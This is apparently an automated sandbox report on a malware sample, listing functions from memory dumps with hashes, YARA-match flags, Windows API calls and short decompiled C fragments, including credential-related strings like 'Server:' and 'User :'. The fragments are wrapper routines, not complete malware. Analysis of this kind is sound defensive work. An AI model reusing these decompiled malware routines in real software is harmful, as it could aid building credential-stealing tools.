                                                                          • Opcode ID: b7891f9f49e71becdebe7b77431fac2f999a18427c6aceeee3c0769b1bc2796d
                                                                          • Instruction ID: 14de7ebefaab9ccc24c99cd76975180ce32aafb50e1d4538848f1dae89dc26f7
                                                                          • Opcode Fuzzy Hash: b7891f9f49e71becdebe7b77431fac2f999a18427c6aceeee3c0769b1bc2796d
                                                                          • Instruction Fuzzy Hash: 6290027120100413E2126169490470700199BD0381F91C422A0455558D96968952F161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a1da4bcebe929bb43f72c8266007ca99e547f3ac72f24dc8e6743261d1f59d2a
                                                                          • Instruction ID: b1f62913d1b5a8eefa9d95bd600ccb687fed96380f8c4c1820645e7f88d55fca
                                                                          • Opcode Fuzzy Hash: a1da4bcebe929bb43f72c8266007ca99e547f3ac72f24dc8e6743261d1f59d2a
                                                                          • Instruction Fuzzy Hash: 25900261242041526646B16948045074016ABE0381791C022A1445950C85669856E661
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A699A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 6a7420aeb782ecf547c12447f152fd5cfcee7a7eac8d76731e6912559ad73c5e
                                                                          • Instruction ID: 067ae6ef6ecf2ed9457a95aad9d2030ce8d4ebd65acc2f0776cd1e7ea8259950
                                                                          • Opcode Fuzzy Hash: 6a7420aeb782ecf547c12447f152fd5cfcee7a7eac8d76731e6912559ad73c5e
                                                                          • Instruction Fuzzy Hash: D59002A134100442E20161694814B060015DBE1341F51C025E1095554D8659CC52B166
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A695D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 4a43ba96536f12ec460432f5908869f85b387ffa6ba26767f608694cfbb9103f
                                                                          • Instruction ID: 7db3bf3433d3d111e0c74b8438bfdeff5ca9c55e8b09549d2b65af344c586f88
                                                                          • Opcode Fuzzy Hash: 4a43ba96536f12ec460432f5908869f85b387ffa6ba26767f608694cfbb9103f
                                                                          • Instruction Fuzzy Hash: 9B9002A120200003520671694814616401A9BE0341B51C031E1045590DC5658891B165
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: c3ccfefa818315a56c932ba9f18727414f48f0bf2a1463c91a9a15d646c2bf8f
                                                                          • Instruction ID: 954f0f192534fd47b2bec5c401b5ccaf24c77622efc9af7bad5635ffa8b005e2
                                                                          • Opcode Fuzzy Hash: c3ccfefa818315a56c932ba9f18727414f48f0bf2a1463c91a9a15d646c2bf8f
                                                                          • Instruction Fuzzy Hash: 0D9002B120100402E2417169480474600159BD0341F51C021A5095554E86998DD5B6A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 35adbdf6932017b58a6e5a063e646fe695ec9efab7abf6a6b9af4d397c0d4ce9
                                                                          • Instruction ID: cfe49f623e318cb542ce5e3a865a937896d23fe001307d52be8655e90f50ffb9
                                                                          • Opcode Fuzzy Hash: 35adbdf6932017b58a6e5a063e646fe695ec9efab7abf6a6b9af4d397c0d4ce9
                                                                          • Instruction Fuzzy Hash: 72900265211000031206A5690B0450700569BD5391351C031F1046550CD6618861A161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A696E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 2a1fca47144c7f952246272d8a7fb53bad401d1c68b5b49d8f254279739164a7
                                                                          • Instruction ID: 991060d16746c63a908405aded9fd2bbf364c8dd12368440e248f1c24b6e11cb
                                                                          • Opcode Fuzzy Hash: 2a1fca47144c7f952246272d8a7fb53bad401d1c68b5b49d8f254279739164a7
                                                                          • Instruction Fuzzy Hash: 1D90027120108802E2116169880474A00159BD0341F55C421A4455658D86D58891B161
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: fe425067dcbd79483dafaf8ab44533a64aa5036bda182534721b234c15b02cda
                                                                          • Instruction ID: 6a7d9573675f86a645906e1d50146a4bc0aa27aa2870921617e36955064f8eb0
                                                                          • Opcode Fuzzy Hash: fe425067dcbd79483dafaf8ab44533a64aa5036bda182534721b234c15b02cda
                                                                          • Instruction Fuzzy Hash: A690026160100042524171798C449064015BFE1351751C131A09C9550D85998865A6A5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 8198a632e78309de19cf8750b4041fb44720fc906d10d1b996c7b26e0a166b50
                                                                          • Instruction ID: b9426e8c33b5f641d0218486de146f3416d0831e0d6beb4ba4c0fe056b57bf4c
                                                                          • Opcode Fuzzy Hash: 8198a632e78309de19cf8750b4041fb44720fc906d10d1b996c7b26e0a166b50
                                                                          • Instruction Fuzzy Hash: C490027120140402E20161694C1470B00159BD0342F51C021A1195555D86658851B5B1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 0bb0502f8aa8f7b0382bc76200a5ba606420a5caf1a17199441e18ea31961ff7
                                                                          • Instruction ID: 781a8255d62dcf4fc3ea1261527b6b07674a87e27498999ad61092a70af80ab9
                                                                          • Opcode Fuzzy Hash: 0bb0502f8aa8f7b0382bc76200a5ba606420a5caf1a17199441e18ea31961ff7
                                                                          • Instruction Fuzzy Hash: 5F90027120100802E2817169480464A00159BD1341F91C025A0056654DCA558A59B7E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: bb45c5fc85eef064fefec77598f4ed5c212abc79ee7287fe4fc54ac4c0078b89
                                                                          • Instruction ID: 641623cff6d985c587d86227fca349b6099bceb6885b597bc39de05c02aa9e21
                                                                          • Opcode Fuzzy Hash: bb45c5fc85eef064fefec77598f4ed5c212abc79ee7287fe4fc54ac4c0078b89
                                                                          • Instruction Fuzzy Hash: 9390026121180042E30165794C14B0700159BD0343F51C125A0185554CC9558861A561
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A697A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 6010da8dd31037e0d88f68a36c7679f821afa87dfb5b1ea4c374eaa41f308d70
                                                                          • Instruction ID: 231fec821eff354a2640b818d3b2afa05a7ed6fdde836660a6e06cad044f6a6f
                                                                          • Opcode Fuzzy Hash: 6010da8dd31037e0d88f68a36c7679f821afa87dfb5b1ea4c374eaa41f308d70
                                                                          • Instruction Fuzzy Hash: 1B90026130100003E241716958186064015EBE1341F51D021E0445554CD9558856A262
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: cc01aa95728f2a05371f761b05b96f1bfaeea0d13a0d83a2b4048cf40a91f3f6
                                                                          • Instruction ID: 40a37a95f365f07569ea185ee0272378452be679f780fa51fbde9fed2cdec828
                                                                          • Opcode Fuzzy Hash: cc01aa95728f2a05371f761b05b96f1bfaeea0d13a0d83a2b4048cf40a91f3f6
                                                                          • Instruction Fuzzy Hash: FF90026921300002E2817169580860A00159BD1342F91D425A0046558CC9558869A361
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 4efab4c3047cb3dfa1c4abadc292bbc33442e91312ff46bf5180ad7987027a36
                                                                          • Instruction ID: d9ce752e7a32312a3939176bb8d94f530101acef4cb3165c33e07ba2be6f1b8d
                                                                          • Opcode Fuzzy Hash: 4efab4c3047cb3dfa1c4abadc292bbc33442e91312ff46bf5180ad7987027a36
                                                                          • Instruction Fuzzy Hash: 5B90027131114402E2116169880470600159BD1341F51C421A0855558D86D58891B162
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A69710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 304db442758e908d0ac0d34e6161ffae0c45046f23250b01cc32e6a7d1a92b05
                                                                          • Instruction ID: 386471ae4f6d682ccc07f0809ab14a9b88e91409d86e81809b2cc46760e0c222
                                                                          • Opcode Fuzzy Hash: 304db442758e908d0ac0d34e6161ffae0c45046f23250b01cc32e6a7d1a92b05
                                                                          • Instruction Fuzzy Hash: 8490027120100402E20165A9580864600159BE0341F51D021A5055555EC6A58891B171
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004088A0, Relevance: .1, Instructions: 92COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                          • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                                          • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                          • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 19%
                                                                          			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				void* _t24;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				E0041A8F0( &_v68, 3);
				_t24 = _a4 + 0x1c;
				_t12 = E00409B10(_t24, _t24,  &_v68); // executed
				_push(0xc4e7b6d6);
				_push(0);
				_push(0);
				_push(_t12);
				_push(_t24);
				_t13 = E00413E20();
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409270(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                          0x0040726f
                                                                          0x00407273
                                                                          0x0040727e
                                                                          0x0040728a
                                                                          0x0040728e
                                                                          0x00407293
                                                                          0x00407298
                                                                          0x0040729a
                                                                          0x0040729c
                                                                          0x0040729d
                                                                          0x0040729e
                                                                          0x004072a3
                                                                          0x004072aa
                                                                          0x004072ad
                                                                          0x004072ba
                                                                          0x004072bc
                                                                          0x004072be
                                                                          0x004072db
                                                                          0x004072db
                                                                          0x00000000
                                                                          0x004072dd
                                                                          0x004072e2

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                          • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                          • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                          • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00407233, Relevance: 1.5, APIs: 1, Instructions: 40threadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: cc40fc7fc17e6492520f2aa5c3019b5c3b9d9ec495723ecbbfc879adac9a425b
                                                                          • Instruction ID: 0e427fbd74a0cf7e4b5ee445ab54346eae45434012d9e4fc57cf7f0dc1be7ad6
                                                                          • Opcode Fuzzy Hash: cc40fc7fc17e6492520f2aa5c3019b5c3b9d9ec495723ecbbfc879adac9a425b
                                                                          • Instruction Fuzzy Hash: 93F0A031B8022435E62155442C03FBE62485B40B11F14416FFF04FA1C1E6E8AD0502EA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004184B3, Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 53%
                                                                          			E004184B3(void* __edx, intOrPtr _a8, void* _a12, long _a16, void* _a20) {
				char _t12;
				void* _t19;

				asm("lahf");
				_pop(_t24);
				asm("sbb al, 0xdb");
				_t9 = _a8;
				_t5 = _t9 + 0xc74; // 0xc74
				E00418DB0(_t19, _a8, _t5,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a12, _a16, _a20); // executed
				return _t12;
			}





                                                                          0x004184b3
                                                                          0x004184b4
                                                                          0x004184bc
                                                                          0x004184c3
                                                                          0x004184cf
                                                                          0x004184d7
                                                                          0x004184ed
                                                                          0x004184f1

                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: bea66a8587ba214ab9dc1ce72e27bc2888dfc37baa12562c5211180f42e38287
                                                                          • Instruction ID: 62f83f77244fde238d314b647b3fcd8ebf74707431561513bda67f5571d44521
                                                                          • Opcode Fuzzy Hash: bea66a8587ba214ab9dc1ce72e27bc2888dfc37baa12562c5211180f42e38287
                                                                          • Instruction Fuzzy Hash: 5CE0A975200304ABDB18DF58CC8AED7B7A8EF88310F014089FD181B281C630E920CBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                          0x004184cf
                                                                          0x004184d7
                                                                          0x004184ed
                                                                          0x004184f1

                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                          • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                          • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                          0x00418497
                                                                          0x004184ad
                                                                          0x004184b1

                                                                          APIs
                                                                          • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AllocateHeap
                                                                          • String ID:
                                                                          • API String ID: 1279760036-0
                                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                          • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                          • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                          0x0041863a
                                                                          0x00418650
                                                                          0x00418654

                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                          • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                          • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00418500(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                          0x00418503
                                                                          0x0041851a
                                                                          0x00418528

                                                                          APIs
                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                          • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                          • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004184F2, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 58%
                                                                          			E004184F2(intOrPtr _a4, int _a8) {
				void* _t7;
				void* _t13;

				asm("adc al, 0x8b");
				asm("repne or eax, 0x4485d4be");
				 *(_t7 + 0x174382a3) =  *(_t7 + 0x174382a3) | 0x00000055;
				_t8 = _a4;
				E00418DB0(_t13, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t8 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}





                                                                          0x004184f2
                                                                          0x004184f4
                                                                          0x004184fa
                                                                          0x00418503
                                                                          0x0041851a
                                                                          0x00418528

                                                                          APIs
                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          • Opcode ID: f8ee639ea310b1b4883bf40a5b7d97084d082481f77c77dc401033eb23797587
                                                                          • Instruction ID: 163d7fe3a7547841e6cedbad5cd1929fa4a8a5ad73ef9f7fb3be2867dd4124e7
                                                                          • Opcode Fuzzy Hash: f8ee639ea310b1b4883bf40a5b7d97084d082481f77c77dc401033eb23797587
                                                                          • Instruction Fuzzy Hash: B0E08C30600200ABD724DF94CC86EC77BA8EF89750F018068BE1C6B292C934EA00CBE0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A6967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256562331.0000000000A00000.00000040.00000001.sdmp, Offset: 00A00000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: a0de58f616c1567e2f632abb9699660eb43bfd6fe47013784842643a9243cdda
                                                                          • Instruction ID: 828f9609f8c6effedad16f9150fff7105cb7980b6009243bdb24b30f8e16e59a
                                                                          • Opcode Fuzzy Hash: a0de58f616c1567e2f632abb9699660eb43bfd6fe47013784842643a9243cdda
                                                                          • Instruction Fuzzy Hash: E3B09B719015C5C5E711D7704B0871779147BD0741F16C061D1060641A4778C491F5B6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 004162A4, Relevance: 3.9, Strings: 3, Instructions: 152COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Port:User :$Server:$User :
                                                                          • API String ID: 0-3633964700
                                                                          • Opcode ID: c67080f1a24cd7b1dd9c0a8d79c7cfe82afa16522edcc1695a03186d00568b88
                                                                          • Instruction ID: 9a465fef807fff64654f4f02fa5a49b00295fa9755e939ac42d1cf5cdd30cb7d
                                                                          • Opcode Fuzzy Hash: c67080f1a24cd7b1dd9c0a8d79c7cfe82afa16522edcc1695a03186d00568b88
                                                                          • Instruction Fuzzy Hash: 924168B2801208A7CF11DFA5DC91DDB77BCAB48314F04499FF54962101E939EAD88BE9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0041581E, Relevance: .0, Instructions: 21COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.256111645.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
